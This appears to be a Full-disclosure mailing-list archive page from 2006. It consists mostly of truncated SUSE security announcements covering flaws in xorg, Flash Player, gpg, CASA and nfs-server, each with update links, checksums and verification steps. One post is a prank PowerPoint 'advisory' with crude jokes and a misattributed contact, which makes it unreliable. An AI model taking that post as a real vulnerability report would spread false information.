Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm eaf09598db97183bdb25478dc5266edf SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm 427de6f3af871dca3d9c6c4f42d14793 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm e84dd17634bcb046ade69fcdc8d67468 Sources: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/RealPlayer-10.0.7-0.1.nosrc.rpm d686f982312d06ff76ad786c29c94f5a SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/RealPlayer-10.0.7-0.1.src.rpm 5355bf3f17801d07f9a004711622dc8e SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/RealPlayer-10.0.7-0.1.src.rpm 0a7e783c563c24107b04b7f7f4e0b697 Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/3ad7b20395a03f666b8f4ffe14e9276d.html __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify file replacing file with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made DATE using RSA key ID
[Full-disclosure] SUSE Security Announcement: xorg-x11-server local privilege escalation (SUSE-SA:2006:016)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:xorg-x11-server Announcement ID:SUSE-SA:2006:016 Date: Tue, 21 Mar 2006 11:00:00 + Affected Products: SUSE LINUX 10.0 Vulnerability Type: local privilege escalation Severity (1-10):7 SUSE Default Package: yes Cross-References: CVE-2006-0745 Content of This Advisory: 1) Security Vulnerability Resolved: local privilege escalation in the X.Org Xserver Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A programming flaw in the X.Org X Server allows local attackers to gain root access when the server is setuid root, as is the default in SUSE Linux 10.0. This flaw was spotted by the Coverity project. Only SUSE Linux 10.0 is affected, older products do not include the problematic piece of code. This problem is tracked by the Mitre CVE ID CVE-2006-0745. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xorg-x11-server-6.8.2-100.4.i586.rpm f9187a4620e159d0989986883bf634ff Power PC Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xorg-x11-server-6.8.2-100.4.ppc.rpm 7f6f668edc4addf3650f9a7010e67964 x86-64 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/xorg-x11-server-6.8.2-100.4.x86_64.rpm 2fdb791cc8a0054d1c76c61d136c88b7 __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify file replacing file with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made DATE using RSA key ID 3D25D3D9 gpg: Good signature from SuSE Security Team [EMAIL PROTECTED] where DATE is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or RPM package: 1) Using the internal gpg signatures of the rpm package 2) MD5 checksums as provided in this announcement 1) The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig file.rpm to verify the signature of the package, replacing file.rpm with the
[Full-disclosure] SUSE Security Announcement: flash-player buffer overflow (SUSE-SA:2006:015)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:flash-player Announcement ID:SUSE-SA:2006:015 Date: Tue, 21 Mar 2006 11:00:00 + Affected Products: Novell Linux Desktop 9 SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 Vulnerability Type: remote code execution Severity (1-10):8 SUSE Default Package: yes Cross-References: CVE-2006-0024 Content of This Advisory: 1) Security Vulnerability Resolved: remote buffer overflow in flash-player Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion A critical security vulnerability has been identified in the Adobe Macromedia Flash Player that allows an attacker who successfully exploits these vulnerabilities to take control of the application running the flash player. A malicious SWF must be loaded in the Flash Player by the user for an attacker to exploit these vulnerabilities. This issue is tracked by the Mitre CVE ID CVE-2006-0024. 2) Solution or Work-Around If you do not want to view Flash content, you can deinstall the Flash Player by doing: rpm -e flash-player Otherwise please install the updated packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/flash-player-7.0.63.0-1.1.i586.rpm 0c45a695373aac68f923b7a5ebcb4241 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/flash-player-7.0.63.0-1.1.i586.rpm bd8d78f4d2409521f994ca870698e50e SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/flash-player-7.0.63.0-1.1.i586.rpm 929136205231c24e4771ea0bbff9679b SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/flash-player-7.0.63.0-1.2.i586.rpm dac8004a7507564f4b865bdbac8be214 Sources: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/flash-player-7.0.63.0-1.1.src.rpm 16f6c0d77f66993f9ba93bd4fd08fa64 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/flash-player-7.0.63.0-1.1.src.rpm f5418883a07b77d0bcf75a36b04da604 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/flash-player-7.0.63.0-1.1.src.rpm 2c7f5b5b97080a78c6df5f44b09b8f72 SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/flash-player-7.0.63.0-1.2.src.rpm 044f4b8541dafb24643566fa853cbf76 Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/d000a328085994512d2a98ef9e006471.html __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify file replacing file with the name of the file where you saved the announcement. The output for a valid signature looks like:
[Full-disclosure] [ADVISORY] + [Thu Mar 16 21:02:56 EST 2006] + Local Privilege Escalation Vulnerability in Microsoft PowerPoint
[ADVISORY] + [Thu Mar 16 21:02:56 EST 2006] + Local Privilege Escalation Vulnerability in Microsoft PowerPoint ++ 8===D Background ++ This product had no background information on the product. ++ 8===D Description ++ Microsoft PowerPoint incorrectly validates user input, making privilege escalation possible. ++ 8===D Workaround ++ This advisory had no workarounds on this issue. ++ Contact ++ Marcus Meissner [EMAIL PROTECTED] 1-888-565-9428 BEWARE THE JIZZTAPO!!! .. _ .' `. /\) / / / / /\ \ \ / \ _ \ \/ /\ \ (/\ \ / \ \ \ \ / \ (Y ) \ \/ /\ \ \ / \ \ \/ / / / / ( Y) GSAE CCE CSFA GREM SSP-CNSA GIPS SSCP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SUSE Security Announcement: gpg signature checking problems (SUSE-SA:2006:014)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:gpg Announcement ID:SUSE-SA:2006:014 Date: Fri, 10 Mar 2006 18:00:00 + Affected Products: SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE SLES 9 UnitedLinux 1.0 Vulnerability Type: remote code execution Severity (1-10):9 SUSE Default Package: yes Cross-References: CVE-2006-0049 Content of This Advisory: 1) Security Vulnerability Resolved: gpg signature verification problem Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion The GNU Privacy Guard (GPG) allows crafting a message which could check out correct using --verify, but would extract a different, potentially malicious content when using -o --batch. The reason for this is that a .gpg or .asc file can contain multiple plain text and signature streams and the handling of these streams was only possible when correctly following the gpg state. The gpg --verify option has been changed to be way more strict than before and fail on files with multiple signatures/blocks to mitigate the problem of doing the common --verify checks and -o extraction. This problem could be used by an attacker to remotely execute code by using handcrafted YaST Online Patch files put onto a compromised YOU mirror server and waiting for the user to run YOU. This problem is tracked by the Mitre CVE ID CVE-2006-0049. This is a different issue than the gpg signature checking problem for which we released updates a week ago, tracked by SUSE-SA:2006:013 / CVE-2006-0455. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/gpg-1.4.2-5.4.i586.rpm 17f4db7313fb81477d491cd1de3b4a7c SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/gpg-1.4.0-4.4.i586.rpm 781a1f6ee507960c3b7f5ab7b09aae01 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/gpg-1.2.5-3.6.i586.rpm 0ac37c5097314b9d65fe3c00552991ba SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpg-1.2.4-68.13.i586.rpm 2436ccc119ac1af98928536d2b968a3a Power PC Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/gpg-1.4.2-5.4.ppc.rpm 7da97d12baf4aa28e307affa9ccaa2ad x86-64 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/gpg-1.4.2-5.4.x86_64.rpm 490728e89c6564ac1e0b679012a89a42 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/gpg-1.4.0-4.4.x86_64.rpm f258e8971ef2eb171907bbc426e15893 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/gpg-1.2.5-3.6.x86_64.rpm 3e59895b7bed858997bdbc49aece5644 SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/gpg-1.2.4-68.13.x86_64.rpm 6369420f068f5d935bbc01f4798f2f20 Sources: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/gpg-1.4.2-5.4.src.rpm a4ee567384c8744bafc59c19ed89669e SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/gpg-1.4.0-4.4.src.rpm 2d392b6698c4a9bb5f2b54aa51b53405 SUSE LINUX 9.2:
[Full-disclosure] SUSE Security Announcement: gpg, liby2util signature checking problems (SUSE-SA:2006:013)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:gpg,liby2util Announcement ID:SUSE-SA:2006:013 Date: Wed, 01 Mar 2006 11:00:00 + Affected Products: SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 SuSE Linux Desktop 1.0 SuSE Linux Enterprise Server 8 SUSE LINUX Enterprise Server 9 UnitedLinux 1.0 Open Enterprise Server 1 Novell Linux Desktop 9 Vulnerability Type: remote code execution Severity (1-10):9 SUSE Default Package: yes Cross-References: CVE-2006-0455, CVE-2006-0803 Content of This Advisory: 1) Security Vulnerability Resolved: gpg signature checking problems Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion This is a reissue of SUSE-SA:2006:009, after we found out that also gpg version 1.4.x are affected by the signature checking problem of CVE-2006-0455. With certain handcraft-able signatures GPG was returning a 0 (valid signature) when used on command-line with option --verify. This could make automated checkers, like for instance the patch file verification checker of the YaST Online Update, pass malicious patch files as correct and allow remote code execution. This is tracked by the Mitre CVE ID CVE-2006-0455. Also, the YaST Online Update script signature verification had used a feature which was not meant to be used for signature verification, making it possible to supply any kind of script which would be considered correct. This would also allow code execution. This issue is tracked by the Mitre CVE ID CVE-2006-0803. Both attacks require an attacker either manipulating a YaST Online Update mirror or manipulating the network traffic between the mirror and your machine. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-2.12.9-0.4.i586.rpm 91697f9207b20931d669f9f6d085b816 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-devel-2.12.9-0.4.i586.rpm c6815c8ff1cc695f91cf9c1ba6960554 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-2.11.7-0.3.i586.rpm a321ab146d07c50cc69a91352ac28bf7 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-devel-2.11.7-0.3.i586.rpm 1215bcf8f061079dbe05b93b1d611818 SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/gpg-1.2.5-3.4.i586.rpm 3df19ea2069732c17da1b150d76fdba1 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/liby2util-2.10.7-0.3.i586.rpm ab21dd4a8f561abba2cd5b25e3076e41 ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/liby2util-devel-2.10.7-0.3.i586.rpm e1b45fbf2b326e7a4d06d1fa23100415 SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpg-1.2.4-68.10.i586.rpm 5ea37344f72e28ff06f40976081e6499 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/liby2util-2.9.27-0.7.i586.rpm dcdaf21f345b2d4ffa55a78c74625633 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/liby2util-devel-2.9.27-0.7.i586.rpm 18624f647f80b9e39a8c910c90d60c87 Power PC Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/liby2util-2.12.9-0.4.ppc.rpm 584b0cc0fadc160148b98976cbb9abb8
[Full-disclosure] SUSE Security Announcement: CASA remote code execution (SUSE-SA:2006:010)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:CASA Announcement ID:SUSE-SA:2006:010 Date: Wed, 22 Feb 2006 12:00:00 + Affected Products: Novell Linux Desktop 9 Open Enterprise Server 1 Vulnerability Type: remote code execution Severity (1-10):10 SUSE Default Package: yes Cross-References: CVE-2006-0736 Content of This Advisory: 1) Security Vulnerability Resolved: remote root exploit in CASA PAM handler Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion This update fixes a remotely exploitable stack buffer overflow in the pam_micasa authentication module. Since this module is added to /etc/pam.d/sshd automatically on installation of CASA it was possible for remote attackers to gain root access to any machine with CASA installed. This is tracked by the Mitre CVE ID CVE-2006-0736. 2) Solution or Work-Around Upgrade to the fixed packages. You can also deinstall CASA by doing: rpm -e CASA CASA-gui CASA-devel 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates on Novell Linux Desktop 9 and Open Enterprise Server 1 is to use the Redcarpet frontends, either via the GUI interface or the rug commandline frontend. The packages are also offered for installation from the maintenance web: http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/eb79800a3d8a5cb6599b75e30f0ba133.html __ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. __ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify file replacing file with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made DATE using RSA key ID 3D25D3D9 gpg: Good signature from SuSE Security Team [EMAIL PROTECTED] where DATE is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. There are two verification methods that can be used independently from each other to prove the authenticity of a downloaded file or RPM package: 1) Using the internal gpg signatures of the rpm package 2) MD5 checksums as provided in this announcement 1) The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig file.rpm to verify the signature of the package, replacing file.rpm with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from [EMAIL PROTECTED] with the key ID 9C800ACA. This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement. 2) If you need an alternative means of verification, use the md5sum command to verify the authenticity of the packages. Execute the command md5sum filename.rpm after you downloaded the file
[Full-disclosure] SUSE Security Announcement: gpg, liby2util signature checking problems (SUSE-SA:2006:009)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:gpg,liby2util Announcement ID:SUSE-SA:2006:009 Date: Mon, 20 Feb 2006 18:00:00 + Affected Products: SUSE LINUX 10.0 SUSE LINUX 9.3 Vulnerability Type: remote code execution Severity (1-10):9 SUSE Default Package: yes Cross-References: CVE-2006-0455 Content of This Advisory: 1) Security Vulnerability Resolved: gpg incorrect signature checking Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion With certain handcraftable signatures GPG was returning a 0 (valid signature) when used on command-line with option --verify. This only affects GPG version 1.4.x, so it only affects SUSE Linux 9.3 and 10.0. Other SUSE Linux versions are not affected. This could make automated checkers, like for instance the patch file verification checker of the YaST Online Update, pass malicious patch files as correct. This is tracked by the Mitre CVE ID CVE-2006-0455. Also, the YaST Online Update script signature verification had used a feature which was lost in gpg 1.4.x, making it possible to supply any kind of script which would be thought correct. This would also allow code execution. Both attacks require an attacker either manipulating a YaST Online Update mirror or manipulating the network traffic between the mirror and your machine. 2) Solution or Work-Around There is no known workaround, please install the update packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/gpg-1.4.2-5.2.i586.rpm f1422c0264ff3e270a56d03d4b47e762 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-2.12.9-0.3.i586.rpm 9a6f3ee339303f3efd92121dedf441aa ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-devel-2.12.9-0.3.i586.rpm b504c0cf0f84039018ae1ac90d2e5292 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/gpg-1.4.0-4.2.i586.rpm fffa34f3034effa188cbeb942473e200 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-2.11.7-0.3.i586.rpm a321ab146d07c50cc69a91352ac28bf7 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-devel-2.11.7-0.3.i586.rpm 1215bcf8f061079dbe05b93b1d611818 Power PC Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/liby2util-2.12.9-0.3.ppc.rpm 287ef59b3aec2b9aaaba0e17a9cbba27 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/liby2util-devel-2.12.9-0.3.ppc.rpm f0bd4524c50c5e0a5613f70393ba4489 x86-64 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/liby2util-2.12.9-0.3.x86_64.rpm edcad55c6587b9322b5895f2e1ff3760 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/liby2util-devel-2.12.9-0.3.x86_64.rpm c6b4a827e8ab4dc6d14608ceeb3e3385 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/liby2util-2.11.7-0.3.x86_64.rpm 7cd1425a429b4637b34aa675d4eeaa85 ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/liby2util-devel-2.11.7-0.3.x86_64.rpm 8d27157261b70a5bb51ab643d8dd1fe8 Sources: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/gpg-1.4.2-5.2.src.rpm 5098f06cba2e38aa0b5181fb3f9cd7f3 ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/liby2util-2.12.9-0.3.src.rpm 3107fb78311f00f01c484c1fa1ab26df SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/gpg-1.4.0-4.2.src.rpm 026b7d74d345815de958152305ffde09
[Full-disclosure] SUSE Security Announcement: nfs-server/rpc.mountd remote code execution (SUSE-SA:2006:005)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SUSE Security Announcement Package:nfs-server Announcement ID:SUSE-SA:2006:005 Date: Thu, 26 Jan 2006 14:00:00 + Affected Products: SUSE LINUX 10.0 SUSE LINUX 9.3 SUSE LINUX 9.2 SUSE LINUX 9.1 Vulnerability Type: remote code execution Severity (1-10):7 SUSE Default Package: no Cross-References: CVE-2006-0043 Content of This Advisory: 1) Security Vulnerability Resolved: remote code execution in rpc.mountd of nfs-server Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: See SUSE Security Summary Report. 6) Authenticity Verification and Additional Information __ 1) Problem Description and Brief Discussion An remotely exploitable problem exists in the rpc.mountd service in the user space NFS server package nfs-server. Insufficient buffer space supplied to the realpath() function when processing mount requests can lead to a buffer overflow in the rpc.mountd and allows remote attackers to execute code as the root user. Code execution is definitely possible if the attacker can create symlinks on any of the file systems on the machine running rpc.mountd (/tmp , /home/attacker or similar). For attackers without filesystem access code execution is potentially possible. NOTE: The nfs-server package is obsolete and has been replaced by the nfs-utils package (kernel NFS server) in all currently supported SUSE Linux products already and is only included for completeness. The nfs-utils package itself is NOT affected by this problem. This issue is tracked by the Mitre CVE ID CVE-2006-0043. 2) Solution or Work-Around If you are still using the old user space nfs-server package, consider switching to the kernel level nfs-utils package which is not affected by this problem. If you are not using NFS serving at all, deinstall the RPM. Otherwise install the updated packages. 3) Special Instructions and Notes None. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv file.rpm to apply the update, replacing file.rpm with the filename of the downloaded RPM package. x86 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/nfs-server-2.2beta51-212.2.i586.rpm 5e37fe16b2c59ecd4f5296ab63710080 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/nfs-server-2.2beta51-209.2.i586.rpm 12d423a4df41149131c184ba98cd139f SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/nfs-server-2.2beta51-208.2.i586.rpm 4df2803717ec4404204f2550c3aa8240 SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/nfs-server-2.2beta51-206.4.i586.rpm 0e4b9814cfc427d708ed664fcb2d5e83 Power PC Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/nfs-server-2.2beta51-212.2.ppc.rpm e64aa29d0b1cdbf8c7801592df9bf199 x86-64 Platform: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/nfs-server-2.2beta51-212.2.x86_64.rpm 961bef35240193e56c5f3bf6828611c8 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/nfs-server-2.2beta51-209.2.x86_64.rpm 8cacbd583e70f204897f5f4449f4dedd SUSE LINUX 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/nfs-server-2.2beta51-208.2.x86_64.rpm 24a0186b5f57fadd1fb7753e416d3d2a SUSE LINUX 9.1: ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/nfs-server-2.2beta51-206.4.x86_64.rpm 33b5dddc7a9e717fa229661efa9592d5 Sources: SUSE LINUX 10.0: ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/nfs-server-2.2beta51-212.2.src.rpm 2fc9d81e214d444cb305f8a485930a48 SUSE LINUX 9.3: ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/nfs-server-2.2beta51-209.2.src.rpm 3d21171dda052e1e744d08ba7dd39742 SUSE LINUX 9.2:
[Full-disclosure] SUSE Security Announcement: novell-nrm remote heap overflow (SUSE-SA:2006:002)
